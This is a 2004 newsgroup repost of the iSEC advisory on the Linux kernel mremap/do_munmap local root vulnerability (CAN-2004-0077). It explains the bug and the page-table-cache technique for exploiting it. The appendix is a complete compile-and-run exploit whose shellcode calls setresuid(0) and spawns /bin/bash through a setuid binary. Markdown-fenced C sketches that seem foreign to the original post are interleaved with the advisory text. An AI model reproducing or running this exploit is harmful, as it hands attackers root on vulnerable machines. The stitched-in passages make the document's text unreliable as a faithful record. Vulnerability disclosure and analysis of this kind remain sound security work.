Kernel Vulnerability

From: Keith (kilo_watt_radio_at_earthlink.net.SPAM-31727)
Date: 03/07/04

    Date: Sun, 07 Mar 2004 16:28:24 -0000
    
    

    Followup-To: comp.os.linux.security

    Synopsis: Linux kernel do_mremap VMA limit local privilege escalation
               vulnerability
    Product: Linux kernel
    Version: 2.2 up to and including 2.2.25, 2.4 up to and including 2.4.24,
               2.6 up to and including 2.6.2
    Vendor: http://www.kernel.org/
    URL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
    CVE: CAN-2004-0077
    Author: Paul Starzetz <ihaquer@isec.pl>
    Date: March 1, 2004

    Issue:
    ======

    A critical security vulnerability has been found in the Linux kernel memory
    management code inside the mremap(2) system call, due to a missing check of a
    function return value. This bug is completely unrelated to the mremap bug
    disclosed on 05-01-2004, except that it concerns the same internal kernel
    function.

    Details:
    ========

    The Linux kernel manages a list of user-addressable valid memory locations on a
    per-process basis. Every process owns a singly linked list of so-called virtual
    memory area descriptors (from now on just VMAs). Every VMA describes the
    start of a valid memory region, its length, and various memory flags
    such as page protection.

    Every VMA in the list corresponds to a part of the process's page table. The
    page table contains descriptors (page table entries, or PTEs for short) of the
    physical memory pages seen by the process. The VMA descriptor can thus be
    understood as a high-level description of a particular region of the process's
    page table, storing PTE properties such as the page R/W flag.

    The mremap() system call provides resizing (shrinking or growing) as well as
    moving of existing virtual memory areas, or any of their parts, across the
    process's addressable space.

    Moving a part of the virtual memory from inside a VMA area to a new location
    requires creation of a new VMA descriptor as well as copying the underlying page
    table entries described by the VMA from the old to the new location in the
    process's page table.

    To accomplish this task the do_mremap code calls the do_munmap() internal kernel
    function to remove any potentially existing old memory mapping in the new
    location as well as to remove the old virtual memory mapping. Unfortunately the
    code doesn't test the return value of the do_munmap() function which may fail if
    the maximum number of available VMA descriptors has been exceeded. This happens
    if one tries to unmap the middle part of an existing memory mapping and the
    process's limit on the number of VMAs has been reached (which is currently
    65535).
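
    To see how close a process is to the VMA limit described above, one can
    count its VMAs from user space. The sketch below assumes a Linux /proc
    filesystem in which each line of /proc/self/maps corresponds to roughly one
    VMA; the function names count_map_lines() and count_own_vmas() are
    illustrative and not part of the advisory.

```c
#include <stdio.h>

/* Count newline-terminated lines in an already opened stream. */
long count_map_lines(FILE *f)
{
    long lines = 0;
    int ch;

    while ((ch = fgetc(f)) != EOF)
        if (ch == '\n')
            lines++;
    return lines;
}

/*
 * Approximate the number of VMAs of the calling process.
 * Assumption: one line of /proc/self/maps per VMA.
 * Returns -1 if the file cannot be opened.
 */
long count_own_vmas(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    long n;

    if (!f)
        return -1;
    n = count_map_lines(f);
    fclose(f);
    return n;
}
```

    A typical process reports a few dozen lines, far below the limit quoted
    above.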

    One of the possible situations can be illustrated with the following picture.
    The corresponding page table entries (PTEs) have been marked with o and x:

    Before mremap():

    (oooooooooooooooooooooooo) (xxxxxxxxxxxx)
    [----------VMA1----------] [----VMA2----]
          [REMAPPED-VMA] <---------------|

    After mremap() without VMA limit:

    (oooo)(xxxxxxxxxxxx)(oooo)
    [VMA3][REMAPPED-VMA][VMA4]

    After mremap() with the VMA limit reached:

    (ooooxxxxxxxxxxxxxxoooo)
    [---------VMA1---------]
         [REMAPPED-VMA]

    Once the maximum number of VMAs in the process's VMA list has been reached,
    do_munmap() will refuse to create the necessary VMA hole, because doing so
    would split the original VMA into two disjoint VMAs and exceed the VMA
    descriptor limit.
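
    The refusal described above can be illustrated with a toy user-space model.
    This is only a sketch and not kernel code: struct mm, struct vma, MAX_VMAS
    (deliberately tiny here) and toy_munmap() are hypothetical names chosen for
    the illustration.

```c
#include <errno.h>
#include <stddef.h>

/* Toy limit on descriptors per process (the advisory quotes 65535). */
#define MAX_VMAS 4

struct vma { unsigned long start, end; };   /* half-open range [start, end) */

struct mm {
    struct vma vmas[MAX_VMAS];
    size_t count;
};

/*
 * Remove [start, end) from the region at index idx.
 * Returns 0 on success, -EINVAL for a bad range, and -ENOMEM when punching
 * a hole in the middle would need one descriptor more than the limit allows.
 */
int toy_munmap(struct mm *mm, size_t idx, unsigned long start, unsigned long end)
{
    struct vma *v;

    if (idx >= mm->count || start >= end)
        return -EINVAL;
    v = &mm->vmas[idx];
    if (start < v->start || end > v->end)
        return -EINVAL;

    if (start > v->start && end < v->end) {
        /* Hole in the middle: one region becomes two. */
        if (mm->count >= MAX_VMAS)
            return -ENOMEM;          /* caller must check this */
        mm->vmas[mm->count].start = end;
        mm->vmas[mm->count].end = v->end;
        mm->count++;
        v->end = start;
        return 0;
    }
    if (start == v->start && end == v->end) {
        /* Whole region removed: reuse the slot for the last descriptor. */
        *v = mm->vmas[mm->count - 1];
        mm->count--;
        return 0;
    }
    if (start == v->start)
        v->start = end;              /* trim the front */
    else
        v->end = start;              /* trim the back */
    return 0;
}
```

    Trimming either end of a region never needs a new descriptor, so only the
    middle-hole case can fail at the limit.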

    Because the return value is not checked after the attempt to unmap the middle
    of VMA1 (this is the first invocation of do_munmap inside the do_mremap code),
    the corresponding page table entries from VMA2 are still inserted into the page
    table location described by VMA1 and thus become subject to VMA1's page
    protection flags. Note also that the original PTEs in VMA1 are lost, leaving
    the corresponding page frames unusable forever.

    The kernel also tries to insert the overlapping VMA into the VMA descriptor
    list, but this fails due to further checks in the low-level VMA manipulation
    code. The low-level VMA list check in the 2.4 and 2.6 kernel versions just calls
    BUG(), thereby terminating the malicious process.

    There are also two other unchecked calls to do_munmap() inside the do_mremap()
    code, and we believe that the second occurrence of unchecked do_munmap is also
    exploitable. The second occurrence takes place if the VMA to be remapped is
    being truncated in place. Note that do_munmap can also fail under an exceptional
    low-memory condition while trying to allocate a VMA descriptor.
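
    The pattern the unchecked calls omit can be sketched in user space as
    follows. This is an illustration only and is not presented as the vendor
    patch: stub_do_munmap(), stub_munmap_should_fail and checked_shrink() are
    hypothetical stand-ins for the kernel code discussed above.

```c
#include <errno.h>

/* Test knob: makes the stand-in below fail like a process at the VMA limit. */
int stub_munmap_should_fail;

/* Hypothetical stand-in for do_munmap(): 0 on success, negative errno on failure. */
int stub_do_munmap(unsigned long addr, unsigned long len)
{
    (void)addr;
    (void)len;
    return stub_munmap_should_fail ? -ENOMEM : 0;
}

/*
 * Shrink a mapping in place from old_len to new_len bytes.
 * Returns the new length on success, or the negative error from the unmap
 * step. The important part is that a failed unmap aborts the operation
 * instead of continuing as if the tail had been removed.
 */
long checked_shrink(unsigned long addr, unsigned long old_len,
                    unsigned long new_len)
{
    if (old_len > new_len) {
        int ret = stub_do_munmap(addr + new_len, old_len - new_len);

        if (ret)
            return ret;   /* the tail is still mapped: stop here */
    }
    return (long)new_len;
}
```

    With the check in place, a failure at the VMA limit is reported to the
    caller and no page table entries are moved afterwards.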

    Exploitation:
    =============

    The vulnerability turned out to be very easily exploitable. Our first guess was
    to move PTEs from one VMA mapping a read-only file (like /etc/passwd) to another
    writeable VMA. This approach failed because after the BUG() macro has been
    invoked the mmap semaphore of the memory descriptor is left in a closed (that is
    down_write()) state thus preventing any further memory operations which acquire
    the semaphore in other clone threads.

    So we turned our attention to the page table cache code, which was introduced
    early in the 2.4 series but not enabled by default. Kernels later than 2.4.19
    enable the page table cache. The basic idea of a page table cache is to keep
    free page frames recently used for page tables in a linked list, to speed up
    the allocation of new page tables.

    On Linux every process owns a reference to a memory descriptor (mm_struct) which
    contains a pointer to a page directory. The page directory is a single page
    frame (we describe the case of 4 KB pages without PAE) containing 1024
    pointers to the page tables. A single page table page on the i386 architecture
    holds 1024 PTEs describing up to 4 MB of the process's virtual memory. A single
    PTE contains the physical address of the page mapped at the PTE's virtual
    address and the page access rights.
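
    The two-level layout described above (1024 directory entries, each covering
    4 MB, and 1024 PTEs per page table, each covering 4 KB) implies a simple
    split of a 32-bit virtual address. The helper names below are illustrative;
    the shifts follow directly from the sizes given in the text.

```c
#include <stdint.h>

#define PAGE_SHIFT   12u     /* 4 KB pages */
#define PGDIR_SHIFT  22u     /* each page directory entry covers 4 MB */
#define PTRS_PER_PTE 1024u   /* PTEs in one page table page */

/* Index of the page directory entry (and thus the page table) for vaddr. */
static inline uint32_t pgd_index(uint32_t vaddr)
{
    return vaddr >> PGDIR_SHIFT;
}

/* Index of the PTE inside that page table. */
static inline uint32_t pte_index(uint32_t vaddr)
{
    return (vaddr >> PAGE_SHIFT) & (PTRS_PER_PTE - 1u);
}

/* Byte offset inside the 4 KB page. */
static inline uint32_t page_offset(uint32_t vaddr)
{
    return vaddr & ((1u << PAGE_SHIFT) - 1u);
}
```

    For example, pgd_index(0x40000000) is 256 and pgd_index(0xbfc00000) is 767,
    so those two addresses are served by different page table pages.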

    The page tables are allocated on demand when a page fault occurs. They are also
    freed, and the corresponding page frames released to the memory manager, if a
    process unmaps parts of its virtual memory spanning at least one page table
    page, that is, a region containing at least one 4 MB sized and 4 MB aligned
    memory area.
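
    The "4 MB sized and 4 MB aligned" condition above can be written as a small
    predicate. This is a sketch of the arithmetic only; the name
    spans_whole_page_table() is hypothetical, and 64-bit arithmetic is used so
    that ranges ending near the top of a 32-bit address space do not overflow.

```c
#include <stdbool.h>
#include <stdint.h>

#define PT_SPAN (1ull << 22)   /* bytes of virtual memory per page table: 4 MB */

/*
 * Return true if [start, start + len) fully contains at least one
 * 4 MB aligned block of 4 MB, i.e. the range of one whole page table.
 */
bool spans_whole_page_table(uint64_t start, uint64_t len)
{
    uint64_t end = start + len;
    /* First 4 MB boundary at or after start. */
    uint64_t first = (start + PT_SPAN - 1) & ~(PT_SPAN - 1);

    return first + PT_SPAN <= end;
}
```

    An unaligned 4 MB range therefore does not qualify, while an unaligned 8 MB
    range does, because it always contains one aligned 4 MB block.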

    There are two paths if a new page table must be allocated: the slow and the fast
    one. The fast path takes one page from the head of the page table cache while
    the slow one just calls get_free_page(). This works well if the pages from the
    page table cache have been properly cleared before inserting them into the
    cache. Normally the page tables are cleared by zap_page_range() which is called
    from do_munmap. It is very important for the proper operation of the Linux
    memory management that all locations of the process's page table actually
    containing a valid PTE are covered by the corresponding VMA descriptor.
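
    Why clearing matters can be seen in a toy model of such a cache. This is a
    simplified user-space sketch, not the kernel implementation: struct pt_page,
    struct pt_cache, pt_alloc() and pt_free() are hypothetical names, and the
    list link is kept in a separate field for clarity.

```c
#include <stdint.h>
#include <stdlib.h>

#define ENTRIES 1024

struct pt_page {
    uint32_t entry[ENTRIES];    /* toy PTEs */
    struct pt_page *next;       /* cache list link (separate field here) */
};

struct pt_cache {
    struct pt_page *head;
};

/*
 * Fast path: pop the head of the cache and hand it out as-is.
 * Slow path: allocate a fresh, zeroed page.
 */
struct pt_page *pt_alloc(struct pt_cache *c)
{
    if (c->head) {
        struct pt_page *p = c->head;

        c->head = p->next;
        p->next = NULL;
        return p;               /* contents are NOT cleared here */
    }
    return calloc(1, sizeof(struct pt_page));
}

/* Put a page on the cache. The caller is trusted to have cleared it. */
void pt_free(struct pt_cache *c, struct pt_page *p)
{
    p->next = c->head;
    c->head = p;
}
```

    In this model a page that is freed with entries still set comes back from
    the fast path with those entries intact, which is why the fast path depends
    on every cached page having been cleared beforehand.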

    In the case of the unchecked do_munmap inside the mremap code we have found a
    condition leaving a part of the page table uncovered by a VMA. The offending
    code is:

    [269] if (old_len >= new_len) {
                    do_munmap(current->mm, addr+new_len, old_len - new_len);
                    if (!(flags & MREMAP_FIXED) || (new_addr == addr))
                            goto out;
            }

    This piece of code is responsible for truncating the VMA the user wants to remap
    in place. It can be easily seen that do_munmap will fail if [addr+new_len,
    addr+new_len + (old_len-new_len)] goes into the middle of a VMA and the maximum
    number of allowed VMA descriptors has been already used by the process. That
    means also that the page table will still contain valid PTEs from addr+new_len
    on. Later in the mremap code a part of the corresponding VMA is moved and
    truncated:

    [179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
                    unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

                    if (allocated_vma) {
                            *new_vma = *vma;
                            new_vma->vm_start = new_addr;
                            new_vma->vm_end = new_addr+new_len;
                            new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;

    but more PTEs (namely old_len) than the length of the created VMA are moved from
    the old location if a new location has been specified along with the
    MREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not
    fail. This situation can be illustrated as follows:

    before mremap:

           <-- old_len -->
    (oooooooooooooooooooooooooooo)
    [------|-----VMA1-----|------]
                |---------------------------------> new_addr

    after mremap, no VMA limit:
                                                    new_len
    (oooooo) (oooooo) (oooooo)
    [-VMA1-] [-VMA3-] [-VMA2-]

    after mremap with the VMA limit reached:
                                                    new_len [*]
    (oooooo oooooo) (oooooo)ooooooooo
    [-----------VMA1-------------] [-VMA2-]

    Those [*] 'ownerless' PTEs in the page table can be further exploited
    since the memory manager has lost track of them. If the process now unmaps a
    sufficiently big area of memory covering those ownerless PTEs, the underlying
    page table frame will be inserted into the page table cache but will still
    contain valid PTEs. That means that on the next page table frame allocation
    inside process P for an address A our PTEs will appear in the page table of the
    process P! If that process tries to access the virtual memory at the address A,
    there also won't be a page fault if the PTEs have appropriate (read or write)
    access rights. In other words: through the page table cache we are able to
    insert any data into the virtual memory space of another process.

    Our code goes through a setuid binary; however, this is not the only
    possibility. We prepare the page table cache so that there is a single empty
    page frame at the front of the cache and then a special page table containing
    'self executing' pages. To fully understand how it works we must dig into the
    execve() system call.

    If a user calls execve(), the kernel removes all traces of the current
    executable, including the virtual memory areas and page tables allocated to the
    process. Then a new VMA for the stack on top of the virtual memory is created
    where the program environment and arguments to the new binary are stored (they
    have been preserved in kernel memory). This causes a first page table frame to
    be allocated for the virtual memory region ranging from 0xbfc00000-0xc0000000.

    Next, the .text and .data sections of the binary to be executed, as well as the
    program interpreter responsible for further loading, are mapped into the fresh
    virtual memory space. For the ELF linking format this is usually the ld.so
    dynamic linker. At this point the kernel does not allocate the underlying page
    tables. Only VMA descriptors are inserted into the process's VMA list.

    After some further work that is not relevant here, the kernel transfers
    control to the dynamic linker to execute the binary. This causes a second page
    fault and triggers demand loading of the first code page of the dynamic linker.
    On a standard Linux kernel this will also allocate a page frame for the page
    table ranging from 0x40000000 to 0x40400000.

    On a kernel with page table cache enabled both allocations will take page frames
    from the cache first. That means that if the second page in the cached page list
    contains valid PTEs those could appear instead of the regular dynamic linker
    code. It is easy to place the PTEs so that they will shadow the code section of
    the dynamic linker. Note that the first PTE entry of a page is used by the cache
    code to maintain the page list. In our code we populate the page table cache
    with special frames containing PTEs to pages with a short shell code at the end
    of the page and fill the pages with a NOP landing zone.

    We must also mention that the first mremap hole disclosed on 05-01-2004 can
    also be exploited very easily through the page table cache. Details are left
    for the skilled reader.

    A second possibility to exploit the mremap bug is to create another VMA covering
    ownerless PTEs from a read-only file like /etc/passwd.

    Impact:
    =======

    Since no special privileges are required to use the mremap(2) system call any
    process may use its unexpected behavior to disrupt the kernel memory management
    subsystem.

    Proper exploitation of this vulnerability leads to local privilege escalation
    giving an attacker full super-user privileges. The vulnerability may also lead
    to a denial-of-service attack on the available system memory.

    Tested and known to be vulnerable kernel versions are all <= 2.2.25, <= 2.4.24
    and <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the
    MREMAP_FIXED flag but this does not prevent the bug from being successfully
    exploited. All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released. There is no hotfix for this
    vulnerability. Limiting per-user virtual memory does not help, since
    do_munmap() can still fail.
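
    The version ranges listed above can be turned into a simple check for
    inventory purposes. This is a minimal sketch that covers only the stable
    series named in this advisory; advisory_lists_vulnerable() is a hypothetical
    helper, and a release string alone cannot show whether a vendor has
    backported a fix.

```c
#include <stdbool.h>
#include <stdio.h>

/*
 * Return true if a release string such as "2.4.24" falls into one of the
 * ranges named in the advisory: <= 2.2.25, <= 2.4.24, <= 2.6.2.
 * Development series (2.3, 2.5) and unparsable strings yield false.
 */
bool advisory_lists_vulnerable(const char *release)
{
    int major = 0, minor = 0, patch = 0;

    if (sscanf(release, "%d.%d.%d", &major, &minor, &patch) != 3 || major != 2)
        return false;

    switch (minor) {
    case 2:
        return patch <= 25;
    case 4:
        return patch <= 24;
    case 6:
        return patch <= 2;
    default:
        return false;
    }
}
```

    The string to test would typically come from uname(2), for example the
    release field of struct utsname.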

    Credits:
    ========

    Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed
    further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION
    PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.

    Disclaimer:
    ===========

    This document and all the information it contains are provided "as is", for
    educational purposes only, without warranty of any kind, whether express or
    implied.

    The authors reserve the right not to be responsible for the topicality,
    correctness, completeness or quality of the information provided in this
    document. Liability claims regarding damage caused by the use of any information
    provided, including any kind of information which is incomplete or incorrect,
    will therefore be rejected.

    Appendix:
    =========

    /*
     *
     * mremap missing do_munmap return check kernel exploit
     *
     * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
     * ./mremap_pte [suid] [[shell]]
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/wait.h>
    #include <sys/utsname.h>

    #include <asm/page.h>

    #define str(s) #s
    #define xstr(s) str(s)

    // this is for standard kernels with 3/1 split
    #define STARTADDR 0x40000000
    #define PGD_SIZE (PAGE_SIZE * 1024)
    #define VICTIM (STARTADDR + PGD_SIZE)
    #define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

    #define MREMAP_MAYMOVE ( (1UL) << 0 )
    #define MREMAP_FIXED ( (1UL) << 1 )

    #define __NR_sys_mremap __NR_mremap

    // how many ld.so pages? this is the .text section length (like from cat
    // /proc/self/maps) in pages
    #define LINKERPAGES 0x14

    // suid victim
    static char *suid="/bin/ping";

    // shell to start
    static char *launch="/bin/bash";

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
              ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
                             unsigned long new_len, unsigned long flags,
                             unsigned long new_addr);

    static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
    static int i, pid=0;
    static char *env[2], *argv[2];
    static ulong ret;

    // code to appear inside the suid image
    static void suid_code(void)
    {
    __asm__(
            " call callme \n"

    // setresuid(0, 0, 0), setresgid(0, 0, 0)
            "jumpme: xorl %ebx, %ebx \n"
            " xorl %ecx, %ecx \n"
            " xorl %edx, %edx \n"
            " xorl %eax, %eax \n"
            " mov $"xstr(__NR_setresuid)", %al \n"
            " int $0x80 \n"
            " mov $"xstr(__NR_setresgid)", %al \n"
            " int $0x80 \n"

    // execve(launch)
            " popl %ebx \n"
            " andl $0xfffff000, %ebx \n"
            " xorl %eax, %eax \n"
            " pushl %eax \n"
            " movl %esp, %edx \n"
            " pushl %ebx \n"
            " movl %esp, %ecx \n"
            " mov $"xstr(__NR_execve)", %al \n"
            " int $0x80 \n"

    // exit
            " xorl %eax, %eax \n"
            " mov $"xstr(__NR_exit)", %al \n"
            " int $0x80 \n"

            "callme: jmp jumpme \n"
            );
    }

    static int suid_code_end(int v)
    {
    return v+1;
    }

    static inline void get_esp(void)
    {
    __asm__(
            " movl %%esp, %%eax \n"
            " andl $0xfffff000, %%eax \n"
            " movl %%eax, %0 \n"
            : : "m"(old_esp)
            );
    }

    static inline void cloneme(void)
    {
    __asm__(
            " pusha \n"
            " movl $("xstr(CLONEFL)"), %%ebx \n"
            " movl %%esp, %%ecx \n"
            " movl $"xstr(__NR_clone)", %%eax \n"
            " int $0x80 \n"
            " movl %%eax, %0 \n"
            " popa \n"
            : : "m"(pid)
            );
    }

    static inline void my_execve(void)
    {
    __asm__(
            " movl %1, %%ebx \n"
            " movl %2, %%ecx \n"
            " movl %3, %%edx \n"
            " movl $"xstr(__NR_execve)", %%eax \n"
            " int $0x80 \n"
            : "=a"(ret)
            : "m"(suid), "m"(argv), "m"(env)
            );
    }

    static inline void pte_populate(unsigned addr)
    {
    unsigned r;
    char *ptr;

            memset((void*)addr, 0x90, PAGE_SIZE);
            r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
            ptr = (void*) (addr + PAGE_SIZE);
            ptr -= r+1;
            memcpy(ptr, suid_code, r);
            memcpy((void*)addr, launch, strlen(launch)+1);
    }

    // hit VMA limit & populate PTEs
    static void exhaust(void)
    {
    // mmap PTE donor
            t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
                      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
            if(MAP_FAILED==t)
                    goto failed;

    // prepare shell code pages
            for(i=2; i<LINKERPAGES+1; i++)
                    pte_populate(victim + PAGE_SIZE*i);
            i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
            if(i)
                    goto failed;

    // lock unmap
            base = MMAP_BASE;
            cnt = 0;
            prot = PROT_READ;
            printf("\n"); fflush(stdout);
            for(;;) {
                    t = mmap((void*)base, PAGE_SIZE, prot,
                             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
                    if(MAP_FAILED==t) {
                            if(ENOMEM==errno)
                                    break;
                            else
                                    goto failed;
                    }
                    if( !(cnt%512) || cnt>65520 )
                            printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
                            base+PAGE_SIZE); fflush(stdout);
                    base += PAGE_SIZE;
                    prot ^= PROT_EXEC;
                    cnt++;
            }

    // move PTEs & populate page table cache
            ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
                             MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
            if(-1==ret)
                    goto failed;

            munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
            t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
                     PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
                     0);
            if(MAP_FAILED==t)
                    goto failed;

            *t = *((unsigned *)old_esp);
            munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
            printf("\n[+] Success\n\n"); fflush(stdout);
            return;

    failed:
            printf("\n[-] Failed\n"); fflush(stdout);
            _exit(0);
    }

    static inline void check_kver(void)
    {
    static struct utsname un;
    int a=0, b=0, c=0, v=0, e=0, n;

            uname(&un);
            n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
            if(n!=3 || a!=2) {
                    printf("\n[-] invalid kernel version string\n");
                    _exit(0);
            }

            if(b==2) {
                    if(c<=25)
                            v=1;
            }
            else if(b==3) {
                    if(c<=99)
                            v=1;
            }
            else if(b==4) {
                    if(c>18 && c<=24)
                            v=1, e=1;
                    else if(c>24)
                            v=0, e=0;
                    else
                            v=1, e=0;
            }
            else if(b==5 && c<=75)
                    v=1, e=1;
            else if(b==6 && c<=2)
                    v=1, e=1;

            printf("\n[+] kernel %s vulnerable: %s exploitable %s",
                    un.release, v? "YES" : "NO", e? "YES" : "NO" );
            fflush(stdout);

            if(v && e)
                    return;
            _exit(0);
    }

    int main(int ac, char **av)
    {
    // prepare
            check_kver();
            memset(env, 0, sizeof(env));
            memset(argv, 0, sizeof(argv));
            if(ac>1) suid=av[1];
            if(ac>2) launch=av[2];
            argv[0] = suid;
            get_esp();

    // mmap & clone & execve
            exhaust();
            cloneme();
            if(!pid) {
                    my_execve();
            } else {
                    waitpid(pid, 0, 0);
            }

    return 0;
    }

    -- 
    Best Regards,  Keith
    NW Oregon Radio http://kilowatt-radio.org/
    http://linux.com http://freebsd.org http://apple.com
    Pax melior est quam iustissimum bellum.
    
